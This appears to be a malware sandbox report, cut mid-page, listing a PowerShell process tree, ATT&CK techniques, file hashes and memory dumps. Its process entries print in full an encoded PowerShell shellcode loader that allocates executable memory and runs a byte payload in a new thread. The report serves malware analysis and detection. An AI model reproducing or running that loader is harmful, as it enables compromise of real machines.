AZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABIAEQAQQB3ACAAJABlACIAOwB9AA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2124
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABGAGMAbAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEYAYwBsACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAZAAsADAAeABjADMALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAOAAsADAAeAA3ADkALAAwAHgAYwA3ACwAMAB4AGYAOAAsADAAeABiADMALAAwAHgANQBiACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANAAzACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgAMwBhACwAMAB4AGQANAAsADAAeAAxAGEALAAwAHgANAA2ACwAMAB4ADQAMAAsADAAeAAzADIALAAwAHgANQA1ACwAMAB4AGEAOQAsADAAeABiADgALAAwAHgAYwAzACwAMAB4ADAAYQAsADAAeAA5AGIALAAwAHgANgBhACwAMAB4ADQAYQAsADAAeAAyAGYALAAwAHgAYgBmACwAMAB4ADAAMQAsADAAeAAxAGYALAAwAHgAOAAwACwAMAB4AGMAYgAsADAAeAA0ADcALAAwAHgAYQBjACwAMAB4ADYAYgAsADAAeAA5ADkALAAwAHgANwAzACwAMAB4ADIANwAsADAAeAAxADkALAAwAHgAMwA2ACwAMAB4ADcANAAsADAAeAA4ADAALAAwAHgAOQA0ACwAMAB4ADYAMAAsADAAeABiAGIALAAwAHgAMQAxACwAMAB4ADEAOQAsADAAeABhAGQALAAwAHgAMQA3ACwAMAB4AGQAMQAsADAAeAAzAGIALAAwAHgANQAxACwAMAB4ADYANQAsADAAeAAwADYALAAwAHgAOQBjACwAMAB4ADYAOAAsADAAeABhADYALAAwAHgANQBiACwAMAB4AGQAZAAsADAAeABhAGQALAAwAHgANwAxACwAMAB4ADEAMQAsADAAeAAzADIALAAwAHgANgAzACwAMAB4AGQANgAsADAAeAA1ADIALAAwAHgAOQBlACwAMAB4ADkANAAsADAAeAA1ADMALAAwAHgAMgA2ACwAMAB4ADIAMwAsADAAeAA5ADQALAAwAHgAYgAzACwAMAB4ADIAYwAsADAAeAAxAGIALAAwAHgAZQBlACwAMAB4AGIANgAsADAAeABmADMALAAwAHgAZQA4ACwAMAB4ADQAMgAsADAAeABiADkALAAwAHgAMgAzACwAMAB4ADQAMAAsADAAeABkADAALAAwAHgAZQAxACwAMAB4AGUAMwAsADAAeABlAGEALAAwAHgAYQBlACwAMAB4ADAAOQAsADAAeABlADUALAAwAHgAMwBmACwAMAB4AGEAYgAsADAAeABlADAALAAwAHgAOQAxACwAMAB4ADgAMwAsADAAeABmAGQALAAwAHgAYwAzACwAMAB4AGEANgAsADAAeAA3ADcALAAwAHgAYwA5ACwAMAB4AGEAOAAsADAAeAA1ADgALAAwAHgANQBlACwAMAB4ADAAMwAsADAAeAA2AGUALAAwAHgAOQBiACwAMAB4ADkAMQAsADAAeAA2ADkALAAwAHgAYwAyACwAMAB4ADEAZAAsADAAeABlADkALAAwAHgANABhACwAMAB4AGYAYQAsADAAeAA2AGIALAAwAHgAMAAxACwAMAB4AGEAOQAsADAAeAA4ADcALAAwAHgANgBiACwAMAB4AGQAMgAsADAAeABkADMALAAwAHgANQAzACwAMAB4AGYAOQAsADAAeABjADUALAAwAHgANwA0ACwAMAB4ADEAMAAsADAAeAA1ADkALAAwAHgAMgAyACwAMAB4ADgANAAsADAAeABmADUALAAwAHgAMwBjACwAMAB4AGEAMQAsADAAeAA4AGEALAAwAHgAYgAyACwAMAB4ADQAYgAsADAAeABlAGQALAAwAHgAOABlACwAMAB4ADQANQAsADAAeAA5AGYALAAwAHgAOAA1ACwAMAB4AGEAYgAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADQAYQAsADAAeAAzAGEALAAwAHgAOQA0ACwAMAB4ADAANAAsADAAeAA0AGUALAAwAHgANgA2ACwAMAB4ADQAZgAsADAAeAAyADQALAAwAHgAZAA3ACwAMAB4AGMAMgAsADAAeAAzAGUALAAwAHgANQA5ACwAMAB4ADAANwAsADAAeABhAGEALAAwAHgAOQBmACwAMAB4AGYAZgAsADAAeAA0ADMALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeAA4ADAALAAwAHgAYQBiACwAMAB4AGEAMQAsADAAeABmADcALAAwAHgAZABjACwAMAB4ADMAYgAsADAAeAA2AGQALAAwAHgAMwA1ACwAMAB4AGQAZgAsADAAeABiAGIALAAwAHgAZgA5ACwAMAB4ADQAZQAsADAAeABhAGMALAAwAHgAOAA5ACwAMAB4AGEANgAsADAAeABlADQALAAwAHgAMwBhACwAMAB4AGEAMgAsADAAeAAyAGYALAAwAHgAMgAyACwAMAB4AGIAYwAsADAAeABiADMALAAwAHgAMwA4ACwAMAB4AGQANQAsADAAeAAxADIALAAwAHgANwBiACwAMAB4ADIAOAAsADAAeAAyADgALAAwAHgAOQAzACwAMAB4ADcAYwAsADAAeAA2ADAALAAwAHgAZQBlACwAMAB4AGMANwAsADAAeAAyAGMALAAwAHgAMQBhACwAMAB4AGMANwAsADAAeAA2ADcALAAwAHgAYQA3ACwAMAB4AGQAYQAsADAAeABlADgALAAwAHgAYgBkACwAMAB4ADUAMgAsADAAeABkADEALAAwAHgANwBlACwAMAB4AGYAZQAsADAAeAAwAGIALAAwAHgAZQA0ACwAMAB4ADMANAAsADAAeAA5ADYALAAwAHgANAA5ACwAMAB4AGUANwAsADAAeABjADkALAAwAHgAZABkACwAMAB4AGMANwAsADAAeAAwADEALAAwAHgAOQA5ACwAMAB4ADcAMQAsADAAeAA4ADgALAAwAHgAOQBkACwAMAB4ADUAOQAsADAAeAAyADIALAAwAHgANgA4ACwAMAB4ADQAZQAsADAAeAAzADEALAAwAHgAMgA4ACwAMAB4ADYANwAsADAAeABiADEALAAwAHgAMgAxACwAMAB4ADUAMwAsADAAeABhAGQALAAwAHgAZABhACwAMAB4AGMAYgAsADAAeABiAGMALAAwAHgAMQA4ACwAMAB4AGIAMgAsADAAeAA2ADMALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeAA0ADgALAAwAHgAMQAyACwAMAB4AGEAOQAsADAAeAA5AGYALAAwAHgAMwA0ACwAMAB4ADEANAAsADAAeAAyADEALAAwAHgAMgBjACwAMAB4AGMAOAAsADAAeABkAGEALAAwAHgAYwAyACwAMAB4ADUAOQAsADAAeABkAGEALAAwAHgAOABhACwAMAB4ADIAMgAsADAAeAAxADQALAAwAHgAOAAwACwAMAB4ADEAYwAsADAAeAAzAGMALAAwAHgAOAAyACwAMAB4AGEAZgAsADAAeABhADAALAAwAHgAYQA4ACwAMAB4ADIAOQAsADAAeAA2ADYALAAwAHgAZgA3ACwAMAB4ADQANAAsADAAeAAzADAALAAwAHgANQBmACwAMAB4ADMAZgAsADAAeABjAGIALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeAAzADQALAAwAHgAYwAyACwAMAB4ADUAOQAsADAAeAA3ADUALAAwAHgAMgAyACwAMAB4ADIAYgAsADAAeAA4AGUALAAwAHgANwA1ACwAMAB4AGIAMgAsADAAeAA3AGQALAAwAHgAYwA0ACwAMAB4ADcANQAsADAAeABkAGEALAAwAHgAZAA5ACwAMAB4AGIAYwAsADAAeAAyADUALAAwAHgAZgBmACwAMAB4ADIANQAsADAAeAA2ADkALAAwAHgANQBhACwAMAB4AGEAYwAsADAAeABiADMALAAwAHgAOQAyACwAMAB4ADAAYgAsADAAeAAwADEALAAwAHgAMQAzACwAMAB4AGYAYgAsADAAeABiADEALAAwAHgANwBjACwAMAB4ADUAMwAsADAAeABhADQALAAwAHgANABhACwAMAB4AGEAYgAsADAAeAA2ADUALAAwAHgAOQA4ACwAMAB4ADkAYwAsADAAeAA5ADUALAAwAHgAMQAzACwAMAB4AGYAMAAsADAAeAAxAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGEASgBFAGsAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGEASgBFAGsALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGEASgBFAGsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2844
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ts4kaebw.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2200
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9168.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9167.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9168.tmp

Filesize
1KB

MD5
7fd0df2587e6570dd39fb62b7acafd2b

SHA1
98b60f861a059b2ffb9512d1602f592102c5456e

SHA256
a87879619a07669221e6f9b0e2fb0524494563b3943872eaaf99c8db2886df3a

SHA512
7cc24a1345fcf09eb86ca521535532d70d8600cb627c8d377f96457353a8ba0f839c821227d72d3f64bcc5a73d14c89d648548134bf59637fd40beaad64c71db

Download Submit
C:\Users\Admin\AppData\Local\Temp\ts4kaebw.dll

Filesize
3KB

MD5
6943fad1c3f71d33023ab3609b9de972

SHA1
8c008417ec98e51a09b6114026df467f3fb106a3

SHA256
8a8d53abae39c179741e5bf5b19d248c3e69a1cf84550b9435ecfdc4d1f6decd

SHA512
b3b5881e338f24387c8653c88841db5e4122306bb83d5efd7767e9399457fbade367600c0a43c5e5bf5baff06a4b5e5c421d6746a8826f57af2c5bea51ce00d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ts4kaebw.pdb

Filesize
7KB

MD5
1b9f3767f3466f11de20ed37226b25bd

SHA1
d0a5661698b96d203cf47f4d58be8a51826f6796

SHA256
1f55ca8fe19afe11836b8a60f2c8af99159b862fbdb6f360f34239ace784b052

SHA512
f2bf4d69340eff3018105a4d4983eac7767c70885589e2600695d84719f5cbe86488a9359973fb60a2a78b110d777ec1aad5e8b79e0f0ed18f9f1e0d188fe7d3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TR19MUP30YVD9N95RGWU.temp

Filesize
7KB

MD5
6b8263ca6ac1369b42afad9387f92b54

SHA1
456daf987168a70e8e77d859636572af6c15408d

SHA256
267636b754c7bd9077cd88c257f1cc48d6db0b6192b5fd729b9cf4e1efba3881

SHA512
037d69c96b0528fe1dd78be8627b032f74049b6355f145e0d4014e12ea151be6933f6e3d15f71d1bb6b7b981a6d4eec6a3c9d842ed92e0eca15a007761b9ed05

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9167.tmp

Filesize
652B

MD5
d272dfcb6945e245902036095f6a92fd

SHA1
3ce984aa746707bfd21e26bf3586b820882f32c9

SHA256
edcafcb87a25532b39cd056e5566be4728c76b143cf3a2a2f43a2819fad5108c

SHA512
fd5a99ee275465ead62c257afb80ed857c0b01889da6c9069737c48f5023d67c544ba7eec9b6c24e2e79767299a544661580f0bcf87c32c83f8027bb6f3d1a97

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ts4kaebw.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ts4kaebw.cmdline

Filesize
309B

MD5
ad7c69ee74b34af8386d671908c5c61b

SHA1
d7efd204e16af3e4acb1bf16fe73e43073c71797

SHA256
6fc8c14e05246784f506cf9e8a55c2c71126a723f07d4b0fa25bf87942016540

SHA512
c4f6170841ed6fb77993e2a434421a1c6fc42c6e76888c8ca2928530ecd9fb0af033b3722b517e07e2f73ea02a397b08ac3a3d0074d7890a8bf7608285e51110

Download Submit
memory/2124-32-0x000007FEF3DC0000-0x000007FEF475D000-memory.dmp

Filesize
9.6MB

Download
memory/2124-12-0x000007FEF3DC0000-0x000007FEF475D000-memory.dmp

Filesize
9.6MB

Download
memory/2124-10-0x000007FEF3DC0000-0x000007FEF475D000-memory.dmp

Filesize
9.6MB

Download
memory/2124-9-0x000007FEF3DC0000-0x000007FEF475D000-memory.dmp

Filesize
9.6MB

Download
memory/2124-11-0x000007FEF3DC0000-0x000007FEF475D000-memory.dmp

Filesize
9.6MB

Download
memory/2124-8-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/2124-7-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/2124-6-0x000007FEF407E000-0x000007FEF407F000-memory.dmp

Filesize
4KB

Download
memory/2124-33-0x000007FEF407E000-0x000007FEF407F000-memory.dmp

Filesize
4KB

Download
memory/2440-0-0x000007FEF5CF3000-0x000007FEF5CF4000-memory.dmp

Filesize
4KB

Download
memory/2440-31-0x000007FEF5CF3000-0x000007FEF5CF4000-memory.dmp

Filesize
4KB

Download
memory/2440-1-0x0000000000CE0000-0x0000000000CEA000-memory.dmp

Filesize
40KB

Download
memory/2844-30-0x0000000002A00000-0x0000000002A01000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads